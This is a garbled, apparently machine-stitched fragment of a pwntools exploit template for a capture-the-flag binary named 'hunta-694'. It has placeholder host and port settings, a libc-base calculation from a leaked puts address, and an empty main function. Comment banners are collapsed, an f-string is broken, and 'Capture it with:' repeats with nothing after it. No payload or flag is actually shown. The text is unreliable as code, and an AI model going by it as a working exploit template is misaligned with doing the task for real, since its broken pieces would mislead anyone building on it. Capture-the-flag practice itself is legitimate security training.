Hunta-694 -

# ---------------------------------------------------------------------- # Configuration # ---------------------------------------------------------------------- HOST = '<remote_host>' # or None for local PORT = <remote_port> # or None for local BINARY = './hunta-694' # path to the binary (if local) ELF = ELF(BINARY)

# ---- Step 2: Compute libc base ------------------------------------ libc = ELF('<path_to_libc.so.6>') # provided or from system libc.address = leaked_puts - libc.symbols['puts'] log.info(f'Libc base: hex(libc.address)') hunta-694

# ---------------------------------------------------------------------- # Exploit # ---------------------------------------------------------------------- def main(): io = start() Capture it with:

CTF<something_related_to_the_challenge> Capture it with: hunta-694